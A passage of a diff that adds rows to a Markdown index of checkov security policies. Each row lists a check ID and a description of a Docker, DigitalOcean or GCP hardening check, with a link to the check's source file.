+| 2177 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) |
+| 2178 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) |
+| 2179 | CKV_DIO_2 | resource | digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) |
+| 2180 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) |
+| 2181 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) |
+| 2182 | CKV_DOCKER_1 | dockerfile | EXPOSE | Ensure port 22 is not exposed | dockerfile | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py) |
+| 2183 | CKV_DOCKER_2 | dockerfile | * | Ensure that HEALTHCHECK instructions have been added to container images | dockerfile | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py) |
+| 2184 | CKV_DOCKER_3 | dockerfile | * | Ensure that a user for the container has been created | dockerfile | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py) |
+| 2185 | CKV_DOCKER_4 | dockerfile | ADD | Ensure that COPY is used instead of ADD in Dockerfiles | dockerfile | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py) |
+| 2186 | CKV_DOCKER_5 | dockerfile | RUN | Ensure update instructions are not use alone in the Dockerfile | dockerfile | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py) |
+| 2187 | CKV_DOCKER_6 | dockerfile | MAINTAINER | Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated) | dockerfile | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py) |
+| 2188 | CKV_DOCKER_7 | dockerfile | FROM | Ensure the base image uses a non latest version tag | dockerfile | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py) |
+| 2189 | CKV_DOCKER_8 | dockerfile | USER | Ensure the last USER is not root | dockerfile | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py) |
+| 2190 | CKV_DOCKER_9 | dockerfile | RUN | Ensure that APT isn't used | dockerfile | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py) |
+| 2191 | CKV_DOCKER_10 | dockerfile | WORKDIR | Ensure that WORKDIR values are absolute paths | dockerfile | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py) |
+| 2192 | CKV_DOCKER_11 | dockerfile | FROM | Ensure From Alias are unique for multistage builds. | dockerfile | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py) |
+| 2193 | CKV2_DOCKER_1 | resource | RUN | Ensure that sudo isn't used | dockerfile | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml) |
+| 2194 | CKV2_DOCKER_2 | resource | RUN | Ensure that certificate validation isn't disabled with curl | dockerfile | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml) |
+| 2195 | CKV2_DOCKER_3 | resource | RUN | Ensure that certificate validation isn't disabled with wget | dockerfile | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml) |
+| 2196 | CKV2_DOCKER_4 | resource | RUN | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option | dockerfile | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml) |
+| 2197 | CKV2_DOCKER_5 | resource | ARG | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
+| 2198 | CKV2_DOCKER_5 | resource | ENV | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
+| 2199 | CKV2_DOCKER_5 | resource | RUN | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
+| 2200 | CKV2_DOCKER_6 | resource | ARG | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
+| 2201 | CKV2_DOCKER_6 | resource | ENV | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
+| 2202 | CKV2_DOCKER_6 | resource | RUN | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
+| 2203 | CKV2_DOCKER_7 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option | dockerfile | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml) |
+| 2204 | CKV2_DOCKER_8 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option | dockerfile | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml) |
+| 2205 | CKV2_DOCKER_9 | resource | RUN | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option | dockerfile | [RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml) |
+| 2206 | CKV2_DOCKER_10 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options | dockerfile | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml) |
+| 2207 | CKV2_DOCKER_11 | resource | RUN | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | dockerfile | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml) |
+| 2208 | CKV2_DOCKER_12 | resource | ARG | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
+| 2209 | CKV2_DOCKER_12 | resource | ENV | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
+| 2210 | CKV2_DOCKER_12 | resource | RUN | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
+| 2211 | CKV2_DOCKER_13 | resource | RUN | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false | dockerfile | [RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml) |
+| 2212 | CKV2_DOCKER_14 | resource | ARG | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
+| 2213 | CKV2_DOCKER_14 | resource | ENV | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
+| 2214 | CKV2_DOCKER_14 | resource | RUN | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
+| 2215 | CKV2_DOCKER_15 | resource | RUN | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option | dockerfile | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml) |
+| 2216 | CKV2_DOCKER_16 | resource | ARG | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
+| 2217 | CKV2_DOCKER_16 | resource | ENV | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
+| 2218 | CKV2_DOCKER_16 | resource | RUN | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
+| 2219 | CKV2_DOCKER_17 | resource | RUN | Ensure that 'chpasswd' is not used to set or remove passwords | dockerfile | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml) |
+| 2220 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) |
+| 2221 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) |
+| 2222 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) |
+| 2223 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) |
+| 2224 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) |
+| 2225 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) |
+| 2226 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) |
+| 2227 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) |
+| 2228 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) |
+| 2229 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) |
+| 2230 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) |
+| 2231 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) |
+| 2232 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) |
+| 2233 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) |
+| 2234 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) |
+| 2235 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) |
+| 2236 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) |
+| 2237 | CKV_GCP_20 | resource | google_container_cluster 
| Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | +| 2238 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | +| 2239 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | +| 2240 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | +| 2241 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | +| 2242 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | +| 2243 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | +| 2244 | 
CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | +| 2245 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 2246 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 2247 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | +| 2248 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 2249 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 2250 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default 
service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 2251 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 2252 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 2253 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 2254 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 2255 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 2256 | CKV_GCP_32 | resource | 
google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 2257 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | +| 2258 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 2259 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 2260 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 2261 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | 
[GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 2262 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 2263 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 2264 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 2265 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 2266 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 2267 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | +| 2268 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM 
disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | +| 2269 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 2270 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 2271 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 2272 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 2273 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 2274 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | 
[GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 2275 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 2276 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 2277 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | +| 2278 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | +| 2279 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 2280 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | 
